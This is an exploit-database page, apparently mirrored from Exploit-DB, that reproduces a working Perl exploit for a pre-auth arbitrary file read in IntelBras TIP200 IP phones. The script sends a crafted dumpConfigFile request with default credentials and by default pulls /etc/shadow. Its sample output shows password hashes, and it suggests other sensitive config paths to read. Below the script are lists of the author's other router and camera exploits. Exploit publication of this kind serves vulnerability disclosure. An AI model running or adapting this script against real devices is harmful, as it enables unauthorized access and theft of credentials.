Search for hundreds of thousands of exploits

"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-09-02

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
#!/usr/bin/perl -w
#
#  IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
#  Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl 
#
#  # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#  # ========================================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # ========================================================================================================
#  # >  Authorization => Basic dXNlcjp1c2Vy
#  # >  User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Accept-Ranges => bytes
#  # <  Server => SIPPhone
#  # <  Content-Type => text/html;charset=UTF-8
#  # <  Expires => -1
#  # <  Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
#  # <  Client-Peer => 192.168.1.1
#  # <  Client-Response-Num => 1
#  # ========================================================================================================
#  root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
#  admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
#  guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
#  # ========================================================================================================
#  [test@localhost intelbras]$ 
# 
#  Simple Mode:
#  perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

if ($response->content =~ m/$file/g){

        my $content = $response->content;
        $content =~ s/$file//g;
        $content =~ s/^\n+//;
        print $content;
        print "\n# ========================================================================================================\n";
        exit;

} else {

        print "# Exploit failed or full path is wrong..\n";
        exit;
        
}
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2019-10-08"Zabbix 4.4 - Authentication Bypass"webappsphp"Todor Donev"
2019-09-23"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure"remotehardware"Todor Donev"
2019-09-09"WordPress 5.2.3 - Cross-Site Host Modification"webappsphp"Todor Donev"
2019-09-02"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"remotehardware"Todor Donev"
2019-09-02"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection"remotehardware"Todor Donev"
2019-05-24"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"webappsphp"Todor Donev"
2018-07-11"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"locallinux"Todor Donev"
2018-06-22"Opencart < 3.0.2.0 - Denial of Service"dosphp"Todor Donev"
2018-04-02"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change"webappshardware"Todor Donev"
2018-03-30"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)"webappsasp"Todor Donev"
2018-03-30"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"webappsasp"Todor Donev"
2018-03-28"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change"webappshardware"Todor Donev"
2018-01-17"D-Link DSL-2640R - DNS Change"webappshardware"Todor Donev"
2017-06-18"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change"webappshardware"Todor Donev"
2017-06-17"UTstarcom WA3002G4 - DNS Change"webappshardware"Todor Donev"
2017-06-17"Beetel BCM96338 Router - DNS Change"webappshardware"Todor Donev"
2017-06-17"D-Link DSL-2640U - DNS Change"webappshardware"Todor Donev"
2017-06-16"iBall Baton iB-WRA150N - DNS Change"webappshardware"Todor Donev"
2017-01-22"SunOS 5.11 ICMP - Denial of Service"dosunix"Todor Donev"
2017-01-19"Tenda ADSL2/2+ Modem D820R - DNS Change"webappshardware"Todor Donev"
2017-01-19"Pirelli DRG A115 v3 ADSL Router - DNS Change"webappshardware"Todor Donev"
2017-01-16"Pirelli DRG A115 ADSL Router - DNS Change"webappshardware"Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47337/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.